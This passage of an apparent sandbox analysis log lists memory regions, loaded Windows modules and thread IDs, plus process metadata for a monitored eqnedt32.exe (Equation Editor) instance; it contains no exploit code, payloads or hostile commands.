0x11dc0000 end_va = 0x11ea6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 1336 start_va = 0x11dc0000 end_va = 0x11ea6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 1337 start_va = 0x11eb0000 end_va = 0x11ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011eb0000" filename = "" Region: id = 1338 start_va = 0x11ec0000 end_va = 0x11ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ec0000" filename = "" Region: id = 1339 start_va = 0x11ec0000 end_va = 0x11ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ec0000" filename = "" Region: id = 1340 start_va = 0x11ed0000 end_va = 0x11edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ed0000" filename = "" Region: id = 1341 start_va = 0x11ee0000 end_va = 0x11eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ee0000" filename = "" Region: id = 1342 start_va = 0x11ef0000 end_va = 0x11efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ef0000" filename = "" Region: id = 1343 start_va = 0x11ee0000 end_va = 0x11eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ee0000" filename = "" Region: id = 1344 start_va = 0x11f00000 end_va = 0x11f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f00000" filename = "" Region: id = 1345 start_va = 0x11ee0000 end_va = 0x11eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ee0000" filename = "" Region: id = 1346 start_va = 0x11f00000 end_va = 0x11f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f00000" filename = "" Region: id = 1347 start_va = 0x11ee0000 end_va = 0x11eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ee0000" filename = "" Region: id = 1348 start_va = 0x11dc0000 end_va = 0x11e54fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011dc0000" filename = "" Region: id = 1349 start_va = 0x11e60000 end_va = 0x11e76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e60000" filename = "" Region: id = 1350 start_va = 0x11e80000 end_va = 0x11e82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e80000" filename = "" Region: id = 1351 start_va = 0x11e90000 end_va = 0x11e90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e90000" filename = "" Region: id = 1352 start_va = 0x11f00000 end_va = 0x11f66fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f00000" filename = "" Region: id = 1362 start_va = 0x11e60000 end_va = 0x11e62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e60000" filename = "" Region: id = 1430 start_va = 0x11dc0000 end_va = 0x11dc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011dc0000" filename = "" Region: id = 1431 start_va = 0x11dd0000 end_va = 0x11dd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011dd0000" filename = "" Region: id = 1432 start_va = 0x11de0000 end_va = 0x11de1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011de0000" filename = "" Region: id = 1433 start_va = 0x11df0000 end_va = 0x11df0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011df0000" filename = "" Region: id = 1434 start_va = 0x11e00000 end_va = 0x11e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e00000" filename = "" Region: id = 1534 start_va = 0x11de0000 end_va = 0x11dfefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011de0000" filename = "" Region: id = 1535 start_va = 0x11e10000 end_va = 0x11e10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011e10000" filename = "" Region: id = 1536 start_va = 0x11e20000 end_va = 0x11e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e20000" filename = "" Region: id = 1537 start_va = 0x11e30000 end_va = 0x11e30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011e30000" filename = "" Region: id = 1538 start_va = 0x11e40000 end_va = 0x11e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e40000" filename = "" Region: id = 1539 start_va = 0x11e50000 end_va = 0x11e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011e50000" filename = "" Region: id = 1540 start_va = 0x11e60000 end_va = 0x11e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e60000" filename = "" Region: id = 1541 start_va = 0x11e70000 end_va = 0x11e70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011e70000" filename = "" Region: id = 1542 start_va = 0x11e80000 end_va = 0x11e9efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e80000" filename = "" Region: id = 1571 start_va = 0x11de0000 end_va = 0x11de0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011de0000" filename = "" Region: id = 1572 start_va = 0x11e80000 end_va = 0x11ea4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e80000" filename = "" Region: id = 1573 start_va = 0x11f00000 end_va = 0x11f24fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f00000" filename = "" Thread: id = 1 os_tid = 0xcf0 Thread: id = 2 os_tid = 0x924 Thread: id = 3 os_tid = 0x1330 Thread: id = 4 os_tid = 0xa2c Thread: id = 5 os_tid = 0xf64 Thread: id = 6 os_tid = 0xd00 Thread: id = 7 os_tid = 0xe6c Thread: id = 8 os_tid = 0xed4 Thread: id = 9 os_tid = 0x410 Thread: id = 10 os_tid = 0x564 Thread: id = 11 os_tid = 0x738 Thread: id = 12 os_tid = 0x434 Thread: id = 13 os_tid = 0x890 Thread: id = 14 os_tid = 0x12c4 Thread: id = 15 os_tid = 0x12ac Thread: id = 16 os_tid = 0x6ec Thread: id = 17 os_tid = 0xc70 Thread: id = 18 os_tid = 0x628 Thread: id = 19 os_tid = 0xdac Thread: id = 20 os_tid = 0x51c Thread: id = 21 os_tid = 0xed0 Thread: id = 22 os_tid = 0x1380 Thread: id = 23 os_tid = 0xc94 Thread: id = 24 os_tid = 0x4f0 Thread: id = 25 os_tid = 0x13f0 Thread: id = 26 os_tid = 0x700 Thread: id = 27 os_tid = 0x6f4 Thread: id = 28 os_tid = 0x1290 Thread: id = 29 os_tid = 0x1358 Thread: id = 30 os_tid = 0x4b8 Thread: id = 31 os_tid = 0xec8 Thread: id = 32 os_tid = 0x70 Thread: id = 35 os_tid = 0x1020 Process: id = "2" image_name = "eqnedt32.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x14d3a000" os_pid = "0xc50" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x274" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 812 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 813 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 814 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 815 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 816 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 817 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 818 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 819 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 820 start_va = 0x400000 end_va = 0x48dfff monitored = 0 entry_point = 0x44cd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 821 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 822 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 823 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 824 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 825 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 826 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 830 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 831 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 832 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 833 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 834 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 835 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 836 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 837 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 838 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 839 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 840 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 841 start_va = 0x590000 end_va = 0x64dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 842 start_va = 0x73ee0000 end_va = 0x73f71fff monitored = 0 entry_point = 0x73f20380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 843 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 844 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 845 start_va = 0x670000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 846 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 847 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 848 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 849 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 850 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 851 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 852 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 853 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 854 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 855 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 856 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 857 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 858 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 859 start_va = 0x6c240000 end_va = 0x6c3f4fff monitored = 0 entry_point = 0x6c333d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 860 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 861 start_va = 0x6b470000 end_va = 0x6b4d4fff monitored = 0 entry_point = 0x6b48fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 862 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 863 start_va = 0x70020000 end_va = 0x70038fff monitored = 0 entry_point = 0x700247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 864 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 865 start_va = 0x6b230000 end_va = 0x6b2fafff monitored = 0 entry_point = 0x6b246a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 866 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 867 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 868 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 869 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 870 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 871 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 872 start_va = 0x67440000 end_va = 0x674d1fff monitored = 0 entry_point = 0x6744dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 873 start_va = 0x7b0000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 874 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 875 start_va = 0x940000 end_va = 0x969fff monitored = 0 entry_point = 0x945680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 876 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 877 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 878 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 879 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 880 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 881 start_va = 0xb20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 882 start_va = 0x1f20000 end_va = 0x1fb0fff monitored = 0 entry_point = 0x1f58cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 883 start_va = 0x1f20000 end_va = 0x2256fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 884 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 887 start_va = 0x940000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 888 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 889 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 893 start_va = 0x2260000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 894 start_va = 0x670000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 895 start_va = 0x2400000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 899 start_va = 0x68f30000 end_va = 0x692b8fff monitored = 0 entry_point = 0x68fccc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 900 start_va = 0x670000 end_va = 0x671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 901 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 902 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 905 start_va = 0x6ead0000 end_va = 0x6ecdefff monitored = 0 entry_point = 0x6eb7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 906 start_va = 0x680000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 907 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 908 start_va = 0x3de20000 end_va = 0x3de2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 909 start_va = 0x70040000 end_va = 0x700b4fff monitored = 0 entry_point = 0x70079a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 910 start_va = 0x2260000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 911 start_va = 0x23f0000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 915 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 916 start_va = 0x74360000 end_va = 0x743e3fff monitored = 0 entry_point = 0x74386220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 919 start_va = 0x6a0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 920 start_va = 0x6e0000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 921 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 922 start_va = 0x2260000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 923 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 924 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 925 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 926 start_va = 0x74120000 end_va = 0x7423efff monitored = 0 entry_point = 0x74165980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 929 start_va = 0x940000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 930 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 931 start_va = 0x2b00000 end_va = 0x2b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 932 start_va = 0x720000 end_va = 0x724fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 933 start_va = 0x730000 end_va = 0x731fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 934 start_va = 0x740000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 935 start_va = 0x7a0000 end_va = 0x7affff monitored = 0 entry_point = 0x0 